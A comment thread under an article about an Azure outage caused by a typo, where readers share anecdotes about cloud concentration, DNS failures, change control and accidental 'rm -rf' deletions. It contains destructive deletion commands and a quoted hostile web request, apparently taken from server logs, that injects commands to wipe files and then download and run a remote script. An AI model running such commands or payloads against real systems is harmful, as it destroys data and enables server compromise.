Microsoft’s Azure mishap betrays an industry blind to a big problem

“ELY (n.) – The first, tiniest inkling that something, somewhere has gone terribly wrong.” One of the finest definitions from Douglas Adams and John Lloyd’s The Meaning of Liff, it describes perfectly the start of that nightmare scenario for ops in a big service provider - the rising tide of alerts after that update went live. …

  1. Korev Silver badge
    Mushroom

    I believe the over-reliance on a small set of cloud vendors is a massive threat to our way of life. If stuff goes down harder than what we've seen so far then a substantial part of the planet's infrastructure will just go down.

    Icon for a similar-size outage

    1. TaabuTheCat

      Oh yeah.

      We're just one human away from a spectacular outage. It's going to happen, the only question is when. Will anything change afterward to prevent it again? Likely depends on the severity of the pain to those with oversight and influence. Maybe then you'll get your simulator.

      1. steviebuk Silver badge

        Re: Oh yeah.

        No. Nothing will change. Someone higher up will make some bullshit up why it happened and why it won't happen again. People like us will warn time and time again that that is bollocks but constantly be ignored.

      2. Norman Nescio Silver badge
        Mushroom

        Re: Oh yeah.

        We certainly were one human away from a spectacular outage, but I realise you meant pretty much the opposite. Your phrase triggered the memory.

    2. Franco

      Been saying that for a while, pretty much every major player uses Cloudflare for example so when they go down half the internet's most popular sites go with it.

      1. Mike Pellatt

        Yeah, but at least with Cloudflare you get a detailed, published RCA that will:

        a) put hands up to what went wrong

        b) Tell The World the steps that have/will be taken to reduce the probability of a recurrence.

        Anyone seen that from Microsoft or AWS?

        1. Anonymous Coward
          Anonymous Coward

          They already do

          You mean like this? It was in a link in the other article linked in this one. I'm sure Amazon and Google publish similar post-mortems.

          https://status.dev.azure.com/_event/392143683/post-mortem

          1. Ahosewithnoname

            Re: They already do

            You're not going to get any thanks posting objective replies to anything Microsoft related around here

          2. Anonymous Coward
            Anonymous Coward

            We are all used to 365 as a baseline

            Some teams at Microsoft do a good job of explaining the root cause of a problem, while others just offer vague platitudes and move on.

            A prime example would be the teams working to maintain most of Microsoft 365, who tell us that an issue occurred and what they did to fix it, but that’s about it most of the time. They’ll never tell us why they made the change(s) which caused the issue in the first place, what we as customers stood to gain if applied successfully and what they’re doing to prevent a similar issue occurring in the future.

            For example, who at Microsoft is going to give a detailed explanation of how they broke the new public version of the 365 health center so badly that there’s a Twitter link on it -right now- which doesn’t actually go to Twitter but instead takes you to a mangled version of the health center itself? The URL looks like this: status.office365.com/%E2%80%8B//www.twitter.com/MSFT365Status

            Of course they’re not going to admit that the cause is writing a brand new publicly available health center with restricted info compared to what paying customers see on their 365 portal privately, because then they’d have to admit they have a team of people pointlessly duplicating work, just like their UX teams have been doing with their 365 admin panels for years now.

        2. Mike 125

          > but at least with Cloudflare you get a detailed, published RCA

          If planes keep crashing, is it enough to investigate and explain why?

          The big players can now give 80 pages of explanation.

          And do nothing.

          And get away with it.

          It must cost them realistic bucks, if this is going to change.

          1. Mike Pellatt

            I guess you missed point b) in my post.

      2. Palebushman

        Pretty much all that you have stated Franco is in their publicity video here. https://mediacenter.ibm.com/id/1_2j3k06qh

  2. Anonymous Coward
    Anonymous Coward

    “Making mistakes in a place that mercilessly demonstrates their consequences without them being consequential is the gold standard in safety nets. In aviation, those places are called flight simulators. In electronics, circuit simulators. In humans, Ibiza.”

    Beautiful - that's a poster :)

    1. My other car WAS an IAV Stryker
      Facepalm

      Ibiza?

      Being a 'Murican, not UK/Euro, I had to look this up. Seems like the parallel to saying "that's (Las) Vegas, baby," and the more popular "what happens in Vegas..."

      (If I misinterpreted the context, please gently correct me. You can still downvote, but that way you've earned the right to give one.)

      1. deadlockvictim

        Re: Ibiza?

        Ibiza is a rite of passage for British, Irish & German youth.

        They fly over after school (US: high school) has finished in June, dance, get pissed and come home with the most godawful tattoos.

        Is this anything like the famed Spring Break that one hears about?

        1. My other car WAS an IAV Stryker
          Pint

          Re: Ibiza?

          Yes, actually, very much like Spring Break throughout southern Florida and many resort towns of Mexico and some of the near Caribbean. Thanks for the clarification; here's one for you if you didn't get enough in Ibiza. --->

          (Not like I have first-hand experience; I was too much of a Band Geek traveling with the pep band to college basketball tournaments at that time of year. Still had plenty of drinking after our games, though, win or lose.)

      2. JBowler

        Re: Ibiza?

        Cabo

  3. Howard Sway Silver badge

    If a tiny typo brings down half of Brazil, perhaps we’re the nuts

    Quite a lot of people realised a long time ago that placing your faith in single points of failure is the real problem. If a single administrator's typo is all that stands between half the world's systems working or not then that is the mother of all single points of failure, and no other engineering principle will ever save you from that, because software engineering should strive to eliminate them as far as possible.

    It's stupid to try and run the world on a small handful of systems, that's the whole reason networking was found to be more resilient than centralisation. All that's happened is the big cloud providers have been selling the idea that the only thing networking is good for now is connecting to their new monolithic centralised systems, and whenever they go down it's shown to be a terrible step backwards for the internet.

    1. Robert Grant

      Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

      The systems aren't monoliths at all, but the configuration application is. And DNS, which is often the culprit for cloud outages.

      1. Anonymous Coward
        Anonymous Coward

        Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

        1st rule of outage: DNS. It is always DNS.

        Then you have just to find what did break the DNS...

        1. dirkjumpertz

          Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

          Abrupt outage -> BGP

          Gradual outage -> DNS

          1. ChoHag Silver badge
            Trollface

            Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

            Random outage -> DEV

        2. Bebu Silver badge

          Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

          《1st rule of outage: DNS. It is always DNS.》

          Surely DNS = does nothing special

          I suspect DNS in some obscure long dead language means 99% probability of being misconfigured with 100% chance of contingently working with just those misconfigurations - change anything ... disaster.

          A bit like Homer Simpson's boss - the perfect balance of terminal diseases or Queen Xanxia (Pirate Planet.)

        3. da39a3ee5e6b4b0d3255bfef95601890afd80709
          Facepalm

          Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

          If it's not DNS, it's the network. It's always the network.

          1. ChoHag Silver badge

            Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

            If it's not DNS because it's the network, it's because some network system is trying to look up a name in the DNS.

      2. JohnTill123

        Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

        Haiku:

        It’s not DNS

        There’s no way it’s DNS

        It was DNS

    2. ecofeco Silver badge

      Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

      Exactly. The whole goddamn point of the PC was to free us FROM centralized systems.

      Yet here we are, not just begging, but PAYING to be put back in chains.

      1. deadlockvictim

        Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

        Yes, and the whole point of Azure is to earn Microsoft shitloads of money.

    3. ChoHag Silver badge

      Re: If a tiny typo brings down half of Brazil, perhaps we’re the nuts

      > "Don't put all your eggs in one basket" first appeared in the 17th-century

      > Quite a lot of people realised a long time ago

      Quite a long time ago.

      There is nothing new under the sun.

  4. Arthur the cat Silver badge

    rm -r *

    Decades ago a colleague who was new to Unix did exactly that in his home directory(*). He came to me and complained about it as he'd specifically read the man page and used the -i flag so it asked him whether to actually delete each file. Unfortunately he came from a VMS background where the flags come at the end, not the beginning. (Yes, he'd put the -r first, that was just rote learning.) Backups saved his day.

    (*) Even in those lax days we wouldn't have let him near root.

    1. longtimeReader

      Re: rm -r *

      I once - very deliberately - did "rm -rf /" on a box that was going to be reimaged anyway. It took a lot longer than I expected to start throwing up errors - so much so that I pushed the command into the background and tried running "ls" to see if it was actually working. Of course, by now it was missing libc (still loaded by the rm command but not visible elsewhere) and the resulting error showed that the deletions were happening. "echo *" still worked for a short time though.

      1. Arthur the cat Silver badge

        Re: rm -r *

        It took a lot longer than I expected

        BT,DT and yes it's a surprisingly long time.

        1. Kevin McMurtrie Silver badge

          Re: rm -r *

          It takes even longer if you've forgotten to unmount the shared network volumes.

      2. Anonymous Crowbar

        Re: rm -r *

        I actually did this on /usr on a running AIX [can't remember but it was either 5.3, 6.1 or 7.1] host. The OS stayed running and we were able to rebuild the whole system from there. [We had backups, but this was a test to see what we could do if we didn't have any backups].

        Was surprised by the fact the whole thing kept running.

        1. Return To Sender
          Alert

          Re: rm -r *

          Had a colleague do something similar whilst dialled in (yep, modems) to a customer system, RS/6000, probably AIX 4.3 or 5.1. Fortunately he 1) spotted the mistake/killed the command pretty quickly and 2) called for help immediately instead of trying to cover up. He lost a small amount of weight very rapidly too...

          Some judicious investigation ("for $deity's sake don't drop the line"), assistance from several of us and remote copying from customer's other AIX systems on their network followed by a 'fess up to customer and a reboot to make sure all was good and you've never seen anybody look so relieved. We took the piss for a while afterwards, you definitely don't do that whilst the poor bugger's looking terrified.

        2. Twilight

          Re: rm -r *

          AIX was a very weird Unix version but it did do some things very, very well.

      3. Doctor Syntax Silver badge

        Re: rm -r *

        "echo *" still worked for a short time though

        echo is a shell built-in. If you have a shell you should have echo.
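A minimal sketch of why "echo *" keeps working after the binaries are gone: the shell expands the glob and runs echo itself, so nothing has to be loaded from disk. The function name ls_builtin is made up for illustration, and this assumes a POSIX shell in which printf and [ are also built in (true of bash and dash).

```shell
#!/bin/sh
# Hypothetical helper: list a directory using only the shell itself.
# No external program (ls, find, ...) is executed, so it still works
# when /bin and /usr/bin have been emptied.
ls_builtin() {
    for entry in "${1:-.}"/*; do
        # Skip the unexpanded pattern left behind by an empty directory
        # (this also skips dangling symlinks).
        [ -e "$entry" ] || continue
        # Strip the leading directory part, leaving the bare name.
        printf '%s\n' "${entry##*/}"
    done
}

# command -v prints a bare name for built-ins and a full path for
# external programs, which hints at what would survive the deletion.
command -v echo
command -v ls
```

Calling ls_builtin /etc on a healthy box should give roughly what "echo /etc/*" gives, one name per line.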

        In my case it was mv rather than rm but when you can no longer reach mv it doesn't make too much difference. A live distro would have fixed it but this was back in SCO days so no live distros about.

      4. Norman Nescio Silver badge
        Coffee/keyboard

        Re: rm -r *

        I remember a very old story, which I can't find with a swift Internet search, about someone recovering a UNIX system after an accidental rm -rf from the root of the filesystem. The hapless person who had done this had stopped the process, but it had still chewed its way through a lot of /bin.

        An old pro had been able to log in to the stricken system via dial-up and have a poke around and work out what could be done with the commands that remained. It ended up with transferring some binaries obtained from another system across using something like xmodem or ymodem, which enabled enough functionality to do a full restore of the operating system. I think the damaged system lacked cp and mv, for example, but I guess still had sh. I don't remember the details, but it was a good read, including using commands in unexpected ways.

        It probably illustrated the need to have good backups, or something: but I was impressed by the technical wizardry used to recover from what appeared to be a fatally damaged system.

        No doubt someone with better memory than me will point it out in an El Reg comment or similar.

      5. Anonymous Coward
        Anonymous Coward

        Re: rm -r *

        So it is you... who keeps trying to break our webservers with commands embedded into the request URL?

        something like this

        "GET /shell?cd+/;rm+-rf+*;wget+ 10.0.0.1/jaws;sh+/jaws"

        (ip address changed to protect the ginormous hosting company that does nothing to stop hack attempts like this... Well, as they keep trying to suck all of our websites into their AI system, why would they)

      6. Cmdr Bugbear

        Re: rm -r *

        I wonder if the OS experienced a bright, white light before finally succumbing to oblivion?

    2. Rafael #872397
      Windows

      Re: rm -r *

      I want to play ITPTSD too!

      I was an intern in a university department that had the ONLY PC with a 10-Mb (go ask grampa) hard drive in the whole university. And it was used by some assistants to run Lotus 1-2-3 or similar (tell grampa I said "hi"). We used that computer at night to develop some very simple tools with Turbo Pascal (better not wake grampa again).

      One day we got to the office and there was a herd of office workers around the machine looking puzzled because "everything was missing". We discovered that one of them inserted a 5.25" floppy disk and typed "format c:". "Are you sure"? "Why, yes, I am sure".

      At the end of the day, the boss was talking to us about the importance of backups... lesson learned.

      1. Boy Quiet

        Re: rm -r *

        Grandad here! (First program 1969 prints banner of girlfriend's name - now wife) - computer life lesson 1 don’t run important stuff on someone else’s machine, 2 keep your own backups. Old software runs for a surprisingly long time if kept in a silo. 1990’s accounts software still runs fine. Windows 7 off-line still good, Excel 2000 why not. A little ‘c’ programming (Borland anyone) to help out. You want the web ? Use your phone or iPad just leave my machines out of it :-)

  5. petef

    Many years ago a colleague asked me to clear my files to free up space on their workstation. I duly removed my /home but left an entry in /etc/passwd so that I could still login but with a home of root. After I'd informed the owner they blindly followed a remove user script, part of which was a question that asked are you sure you want to remove the user's home? A box full of floppies was needed to reimage.

    1. Ayemooth

      Why not just remove stuff INSIDE your home directory, then leave your $homedir as it was? It sounds to me like you changed more than necessary, and that's where the problem started.

      Unless you WANTED to create problems, in which case the BOFH offers you an onion bhaji!

      1. petef

        Guilty as charged. I have more experience under my belt now. I'll accept your bhaji, though.

  6. Anonymous Coward
    Anonymous Coward

    I think the article missed a bigger issue - that we are making our systems much more complicated than they need to be, MS in particular.

    Whenever (and you don't seem to have to wait long) Office 365362 goes down for some or all users, we find out that the whole edifice is built on a massive web of interconnected bits that (for example) punt your "should be simple" login authentication around multiple steps running on different computers all around the world. With my work hat on, on occasions I've noticed issues in our intranet and later seen that there was an MS issue "somewhere in the world" - that wouldn't be too surprising if we weren't the sort of government department that runs its own data centres "for security".

    1. unimaginative
      Pint

      "I think the article missed a bigger issue - that we are making our systems much more complicated than they need to be, MS in particular."

      if only it was just MS, if only.

      There are lots of culprits:

      Web browsers which are now application platforms

      Cloud services which are complex enough you need to learn each one - they need to be flexible enough for all needs, so need to be very configurable, so complex. Just doing something like configuring permissions on AWS means learning the system

      Almost all OSes that provide a GUI.

      Systemd

      Even worse is that all the technology that is needed by a smaller number of big systems gets blindly copied by everyone else because it must be the right way to do it. People start worrying about scalability after the second user visits their website.

      Icon because I now need sone.

      1. hayzoos

        tip of the iceberg

        The copying or emulation of complex systems goes far and wide. non-exhaustive list: automobiles, "smart" products, IOT products, websites, "customer" "support", tax systems, non-smart electronically controlled devices, soft-touch on/off switches, healthcare systems.

        Some of the problem comes from intelligent people egotistically showing their cleverness. The less intelligent are the copiers of the complex.

        This is a far cry from the cleverness of simplicity. Instead of creating a Rube Goldberg contraption, create a system to produce a result with the least resource consumption. This concept used to be the gold standard. What happened?

        1. The Basis of everything is...

          Re: tip of the iceberg

          Progress....

        2. ecofeco Silver badge

          Re: tip of the iceberg

          What happened? Simplicity does not create profits. Unneeded complexity for market lock in and rent, does.

        3. Anonymous Coward
          Anonymous Coward

          Re: tip of the iceberg

          "This concept used to be the gold standard. What happened?"

          Profit. There's a lot more profit when you add 'features' which basically cost nothing and then raise the selling price 100% because it has 'features'.

          Then your competitor adds even more 'features' and the loop is ready. That's what happened.

  7. T G Warren
    Unhappy

    Obvious, so probably never going to happen.

    Can't fault the logic in this. Many years ago I was working on developing a "smart" network system that automatically re-configures itself in the event of a security breach, or (more usually) an interruption to service. Needless to say the first deployment was a catastrophe - if we'd had the tools available then that we have now, the whole process could have been smoothed out & many functional spec iterations could have been avoided along with a significant reduction in development & testing times & costs.

    *Sigh*

  8. andrey.abutin@gmail.com

    For what it's worth, most of the modern implementations of rm will block a recursive delete on /. This is a much more likely error to occur in a script that does something like

    #rm -rf $APPCACHEDIR/*

    Or some other cleanup. As long as APPCACHEDIR is set to a directory, works great. But if a bug or a typo upstream doesn't set the variable to something, BOOM!
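To see why the root-directory guard in rm does not help here, a small sketch: the shell expands $APPCACHEDIR/* before rm ever starts, so with the variable empty rm is handed /bin, /etc and friends, never a literal /. The function name preview_cleanup is hypothetical; it only prints what would be passed and deletes nothing.

```shell
#!/bin/sh
# Hypothetical dry run: print the arguments that
#   rm -rf $APPCACHEDIR/*
# would receive, one per line, without deleting anything.
preview_cleanup() {
    # Left unquoted on purpose, to mirror the risky original line.
    printf '%s\n' $APPCACHEDIR/*
}

# Simulate the upstream bug: the variable ends up empty.
APPCACHEDIR=""
# The pattern collapses to /*, so this prints the top-level
# directories of whatever machine it runs on.
preview_cleanup
```

Swapping rm -rf for printf like this is a cheap way to check a cleanup line before letting it loose.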

    Aside from borked updates, any nation not closely allied with the west would be insane to run any vital infrastructure on software located there. Not when all of it could be simply turned off at the push of a button in case of any dispute.

    A simple test would be to ask a question whether everything would still work properly if all of Internet connections outside the borders were to be completely severed. If the answer is no, then don't run anything on it you can't afford to lose. Just like not putting money in a bank if you can't afford to lose it.

    1. An_Old_Dog Silver badge

      Learn the Frickkin' Shell!

      #rm -rf $APPCACHEDIR/*

      ... should never be used. Instead, code it in a failsafe way: #rm -rf ${APPCACHEDIR:-/dev/null}/*

      Or, code it to print an error: #rm -rf ${APPCACHEDIR:?"Attempting to remove APPCACHEDIR failed because APPCACHEDIR is null, and should not be."}/*
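A slightly fuller sketch of the same idea, wrapped in a function. The name clean_cache and the extra directory checks are assumptions added for illustration, not part of the original suggestion. Note that ${VAR:?} makes a non-interactive shell exit, so the function body is a subshell to keep the caller alive.

```shell
#!/bin/sh
# Hypothetical helper: empty the directory named by APPCACHEDIR,
# refusing to run when the variable is unset or empty.
# The body is a subshell ( ... ) so that a failed ${VAR:?} check ends
# only the function, not the calling script.
clean_cache() (
    # ${VAR:?message} prints the message to stderr and exits non-zero
    # when VAR is unset or null.
    dir=${APPCACHEDIR:?"APPCACHEDIR is unset or empty; refusing to delete"}

    # Extra guards (assumptions for this sketch): the target must be
    # an existing directory, and must not be the root itself.
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; exit 1; }
    [ "$dir" != "/" ] || { echo "refusing to clean /" >&2; exit 1; }

    # Quoted so that spaces in the path cannot split it; -- stops a
    # value starting with "-" being read as an option. The * glob skips
    # dotfiles, so hidden entries are left in place.
    rm -rf -- "$dir"/*
)
```

With APPCACHEDIR unset, clean_cache prints the error and returns non-zero without running rm at all.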

  9. Fabrizio
    Linux

    rm --recursive --force --no-preserve-root /

    Nowadays it's impossible to do a

    rm -rf /

    Instead you have to type the full:

    rm --recursive --force --no-preserve-root /

    So yes: try the former on a VM and don't try the latter!!!

  10. Boris the Cockroach Silver badge

    Emgineering 101

    If a typo is all that stands between you and the end of the world......... at least have systems to try and prevent said tpyo from ending the world.

    Take our aerospace stuff, now 'Jim' wants to change something in our programming , so we have a change sheet drawn up.

    Change:

    Reason for change:

    Who programmed said change:

    Who verified said change:

    Machining cell # :

    Who setup cell #:

    First article inspection:

    Routine inspection(date/time/who by)

    It's most likely that 'Jim' will appear several times, my name at least once, and whichever inspector is available.

    And this piece of paper will be filed away with the job sheets and the new proven program uploaded to our database under a new version number and the job routing card updated to show this.

    The reason why everything is long winded and in paper is so that we can prove the engineering change has had no effect on the final product leaving the loading bay, because it's aerospace and we don't know if the part is part of a luggage bin or the bit that holds the engine to the wing.

    If your change to your DNS/database/server can cause the whole system to fall over then it's as vital as our bits are to an aircraft, and you'll need a change sheet to not only log what you are doing, but get someone else to sign it off too.
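For the ops side, the "someone else signs it off" rule can be sketched as a tiny wrapper. Everything here is hypothetical (the name apply_change, the argument order, logging to stderr); it only shows the shape of the check, not any real change-management tool.

```shell
#!/bin/sh
# Hypothetical gate: run a change command only when the change sheet
# names a verifier who is not the person who made the change.
# Usage: apply_change AUTHOR VERIFIER COMMAND [ARGS...]
apply_change() {
    if [ "$#" -lt 3 ]; then
        echo "usage: apply_change AUTHOR VERIFIER COMMAND [ARGS...]" >&2
        return 2
    fi
    author=$1
    verifier=$2
    shift 2

    if [ -z "$author" ] || [ -z "$verifier" ]; then
        echo "change sheet incomplete: author and verifier required" >&2
        return 1
    fi
    if [ "$author" = "$verifier" ]; then
        echo "change must be verified by someone other than $author" >&2
        return 1
    fi

    # Leave a record before touching anything (stderr here; a real
    # setup would write to an audit log instead).
    echo "change by $author, verified by $verifier: $*" >&2
    "$@"
}
```

So "apply_change jim jim some-command" is refused, while "apply_change jim boris some-command" logs the pair and runs the command.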

    Ask yourself whatever happened to the first ever B-17 bomber.... it crashed because the pilots missed a step in configuring it.... hence all aircraft now have checklists to make sure the pilots setup the aircraft correctly

    1. Strahd Ivarius Silver badge
      Devil

      Re: Emgineering 101

      You are clearly an old fart who never went "agile"

      1. Anonymous Coward
        Anonymous Coward

        Re: You are clearly an old fart who never went "agile"

        You are clearly an old fart who never went Fragile

        TFFY

    2. The Basis of everything is...

      Re: Emgineering 101

      Surely the change must have had some effect on the final product, or why else would you be changing it?

      And for all checking and paperwork in the aviation industry it still has its fair share of "oh $hit" moments where everyone has signed off on the paperwork with what turned out to be less than a full appreciation of exactly what they were signing off on.

      Having said that, the engineering discipline I learned back then has proven invaluable for many subsequent years of swearing at bits instead of pieces. While in many ways things are better than they've ever been, we've still got a lot more to [re]learn.

      (I'll raise a cocktail to the memory of the Mods and Docs office. It might be Finnish inspired though...)

      1. Boris the Cockroach Silver badge
        Boffin

        Re: Emgineering 101

        The change may be a simple "we can't buy tool 101, so here's one from a different supplier that needs to be run faster/slower"

        This means changing the programming

        This means that as its a change, it has to be approved as having no effect on the final product.

        This is the approach to running a reliable system whether it's what I do, or as a software dev, or in the operations room when swapping servers because a HDD is dying. Make sure what you do has no impact on your customer, because nothing is worse than having that phone call from said customer when you've f'ed up.

        Oh and agile is shit and we all know it, move fast and break stuff is fine when it's designing/programming stuff... move it out to the real world and you end up with banks unable to transfer money, heavy lumps of metal fired out of machines at 100 mph (my nightmare) or aircraft that go up and down for a bit before proving the old adage of every plane can land at least once.

        1. uccsoundman

          Re: Emgineering 101

          > Oh and agile is shit and we all know it,

          Yes, but it's CHEAPER. Not only do you no longer need to do testing, but when the product fails, the contract temps that wrote it are LONG gone to another project at another company. The CIO only needs to point to the cost savings and no further questions will be asked. The shareholders only look at that cost and never at the cost of the failure (so sad, too bad). If you are a customer that lost money, oh well, that's life in the big city. Complain to the regulators? LOL, they are in the Bahamas partying with the CIO.

      2. Norman Nescio Silver badge

        Re: Emgineering 101

        And for all checking and paperwork in the aviation industry it still has its fair share of "oh $hit" moments where everyone has signed off on the paperwork with what turned out to be less than a full appreciation of exactly what they were signing off on.

        Somebody signed off on MCAS.

        The reasons it was signed-off are still under investigation, but it could turn out to be a company-killing sign-off, even if it were for what seemed like unimpeachable reasons at the time. Hindsight can be a wonderful thing.

  11. Anonymous Coward
    Anonymous Coward

    Software Defined ... Stuff

    I dislike the term. It's not really software-defined stuff, it's "config files and some scripts".

    But the ops people (whom I have great respect for) aren't used to the "software" world where things will go tits the first time you run them. And then the first time you run them on a machine that isn't the developer's machine. And then the first time you show it to a client. And then the first time you run them on the client's infra and not yours.

    So, yeah, it would be great to have a simulator of the infra to test the impact of changes. That will cost money though and it will also be very hard to produce. Because, by definition, the things that go wrong aren't the things which we anticipated would go wrong.

    It's very easy to configure cloud stuff. Therefore it's very easy to misconfigure it. And that goes treble for the people who are managing the cloud. Quis custodiet ipsos custodes?

  12. Smirnov

    Industry wide phenomenon

    >> But these excrescences are corporate and cultural: the typo-induced Azure outage is an industry wide phenomenon that good people perpetrate. Simple typos and their cousin, Mr Misconfiguration, can unleash chaos to anyone.

    And yet it is predominantly Azure which suffers from a high number of self-inflicted outages, while most of its competitors seem to do a lot better on that front.

    And this is already on top of Azure's tendency to also fail for a number of other reasons, simply because Microsoft's shitty software stack is built from old toilet roll cores and bubble gum on a platform of quicksand.

    So I have to disagree with the author, it's not an industry-wide phenomenon, it's pretty much a Microsoft-specific problem.

    1. hayzoos

      Re: Industry wide phenomenon

      I think your assessment is somewhat accurate. But, a lot of this also comes from lack of experience. The trend is to dump the experienced and hire the fresh out of university or tech school lower cost bright youngun's. So I think it is an industry wide problem. Azure is the canary in the mine though.

      1. Smirnov

        Re: Industry wide phenomenon

        >> I think your assessment is somewhat accurate. But, a lot of this also comes from lack of experience.

        Azure and GCP both launched in 2008, that's 15 years ago. And AWS is even older. After one and a half decades I'm not sure lack of experience is a good explanation.

        >> The trend is to dump the experienced and hire the fresh out of university or tech school lower cost bright youngun's. So I think it is an industry wide problem. Azure is the canary in the mine though.

        GCP is full of experienced cloud engineers, and so are AWS and Azure. I'm sure they have their fair share of people fresh from university but they most certainly don't maintain their infrastructure.

        Instead of staff, it's much more likely that Microsoft's problems are simply rooted in the fact that its cloud infrastructure has grown out of its legacy software stack (Windows and Hyper-V), and while Azure today is a lot more than that (most of it is Linux, actually) the traces of this past can be found everywhere, carrying with it the same problems. In addition, Azure reflects a lot how standalone Microsoft software has been designed. So it's not really surprising that a simple user error can bring down large parts of Azure.

        Neither Amazon nor Google were carrying the same legacy baggage. Which, clearly, has resulted in a lot more robust cloud platforms than Azure.

        As I said, I don't believe it's an industry problem, because no-one else in the industry suffers from the same issues as Microsoft.

        1. Kristian Walsh Silver badge

          Re: Industry wide phenomenon

          I get that you don’t like Microsoft, but don’t let that blind you into believing that these problems are “because Microsoft”; they’re not. We used AWS at a previous job. Lots of outages, big and small. Remember December 2021, when AWS died three times in a month? Okay, one of those was a DC fire, but the other two? A very vague statement from AWS danced around the fact that the cause was a misconfiguration that directed huge volumes of network traffic down a link that couldn’t accommodate it, and that caused a cascade failure across US West.

          If Google had anything like a comparable market share to Microsoft and Amazon, you’d see the same problems from them more often too - as it is, their own services have frequent hours-long outages, but they’re non-essential so nobody cares. (We rejected Google as a cloud provider after looking into the outage rate of Google’s own hosted services...)

          The DevOps model gives great agility, but it also leads companies into a dangerous belief: that because each change made to the system is small, its effects are also small, and easily reversed.

  13. Stolen Time

    ^-r^-rf

    Is there a proofreading error in the article? Several other comments have used "rm -rf" instead of "rm -r", and I remember I got used to typing -rf without really thinking about it... if a mistake is worth making, it's worth making properly.

    1. Kristian Walsh Silver badge

      Re: ^-r^-rf

      -f has another meaning, though: “delete this if it exists, but don’t bug me if it’s already gone” - the “vanilla” rm will bitch if you try to delete something that is not there to be deleted (“Open the door!” “I can’t!” “Why?” “The door is already open!”). For that behaviour, I pretty much always have to use -rf when cleaning up directories.
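
      For anyone who wants to see that difference without risking anything, here is a minimal sketch. It assumes a POSIX shell with mktemp available, works only inside a freshly created scratch directory, and the file name missing.txt and the variable names are made up for illustration.

```shell
# Sketch only: everything happens inside a throwaway directory from mktemp.
workdir=$(mktemp -d)
cd "$workdir" || exit 1

# Plain rm on a file that does not exist complains and returns non-zero.
if rm missing.txt 2>/dev/null; then
    plain_status=0
else
    plain_status=$?
fi

# With -f, a missing operand is silently ignored and rm returns zero.
if rm -f missing.txt; then
    force_status=0
else
    force_status=$?
fi

echo "plain rm exit status: $plain_status"
echo "rm -f exit status:    $force_status"
```

      That zero exit status is why -f tends to end up in cleanup scripts: a step that finds nothing to delete does not abort the run.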

    2. ChoHag Silver badge

      Re: ^-r^-rf

      There were debates in Reg House about how to spell this command in the article. In the end, the safety people won.

      Somebody *will* eat some copy pasta.

  14. notyetanotherid

    Personification

    > Simple typos and their cousin, Mr Misconfiguration, ...

    Miss Configuration, surely?

    1. TimMaher Silver badge
      Happy

      Re: Miss Configuration

      Ms Configuration surely?

      Then you can say that it was “mis-configured”.

  15. mpi Silver badge

    > If a tiny typo brings down half of Brazil, perhaps we’re the nuts

    Well, at some point somewhere the important stuff has to be configured.

    It doesn't matter how the system is designed, there will always be a few core configs that matter so much that getting them wrong will bring down the entire structure. Software isn't like structural engineering where points of failure can be spread out, because software deals with information, not forces. If the info is wrong, it is wrong everywhere all at once.

  16. Joseba4242

    "Nobody who has seen this happen ever forgets - or repeats - it. "

    Especially fun when this happens in a script that's auto-run on every single Mac in the company.

  17. Flywheel
    Facepalm

    rm -r *

    Do it in style: rm -rfv *

  18. martinusher Silver badge

    It's really computing hubris

    I come from the real time world where bugs in your code can have interesting, physical, consequences. This teaches you to be cautious about what you do and how you do it and is a very different mindset to the one exhibited by my applications programming colleagues. Their projects are often late and in "Phase 1" levels of implementation and they're always hankering after "the latest" because this OS/language/tool will rapidly make up any shortfall in timescale, performance, budget or what-have-you. It's not the fault of any particular individual (mostly) but rather it's institutionalized: there's an expectation about delivery and performance being perennially short and the whole mess is exacerbated by development techniques that focus on frequent specification changes, builds and releases. (Or what I tend to think of as "Hose it against that barn wall and see what sticks".) Naturally people like myself are treated as "not really a programmer" (I've had that actually said to my face...) because I'm always working with less than state of the art tools and I and my colleagues tend to adopt a more plodding approach to design and implementation with a big emphasis on testability (with a side of provability).

    I think the problem is cultural. I've lived with it in one form or another for practically 50 years and the mindset has always been around. It really started with minicomputers and the rise of the DiY programmer -- the old mainframes were too big, slow and expensive for people to waste time in suck it and see mode, they'd design the code and test it on the spare (most enterprises had dual systems for redundancy so you'd use the standby for code development and testing). This rather slow approach wasn't foolproof but it generally limited the scope of damage a simple error could cause.

    (....and yes, guess which newbie did a "rm -rf *.lst" as root but accidentally put a space between the * and the '.lst'.......it's the mistake you'll only ever make once.....)(the 'f' not only slowed down the process somewhat but indicated that "a major screwup" was taking place, limiting the damage somewhat)
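
    For anyone who hasn't met that stray space, a minimal sketch of what the shell hands to rm in each case. It deliberately never calls rm: it only counts and prints the operands, inside a scratch directory from mktemp. The file names and variable names are hypothetical, and it assumes a POSIX shell with default globbing settings.

```shell
# Sketch only: throwaway directory, and no rm anywhere, so nothing is deleted.
workdir=$(mktemp -d)
cd "$workdir" || exit 1
touch report.lst build.lst notes.txt main.c   # hypothetical file names

# Intended command: the shell expands *.lst to the listing files only.
set -- *.lst
intended="$*"
intended_count=$#

# Typo: "* .lst" is two separate words. "*" expands to every non-hidden
# file in the directory, and ".lst" is passed along literally as one more operand.
set -- * .lst
typo="$*"
typo_count=$#

printf 'intended (%s operands): %s\n' "$intended_count" "$intended"
printf 'typo     (%s operands): %s\n' "$typo_count" "$typo"
```

    With these four files the intended form yields two operands and the typo yields five: everything in the directory plus a literal .lst. The expansion is done by the shell before rm starts, so rm has no way of knowing a wildcard was ever involved.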

    1. Anonymous Coward

      Re: It's really computing hubris

      "you'd use the standby for code development and testing"

      Ah yes. Except when someone in manglement decided a change was too small to justify bringing up the spare mainframe and ordered it put live without testing. After protesting and being overruled, I was at least stubborn enough to get the order in writing.

      Turned out that some long-gone utter toe-rag had written a quick and dirty undocumented fix yonks ago that didn't bother with the site-standard memory overlay, but just direct-addressed a chunk of memory up the far end of a memory block "because they'll never use that bit". That overwrote my carefully crafted print output with unprintable gibberish, which caused every transaction on the entire high-throughput system to crash (because the change, adding two digits for pence to a single field, was in a print generated by every task).

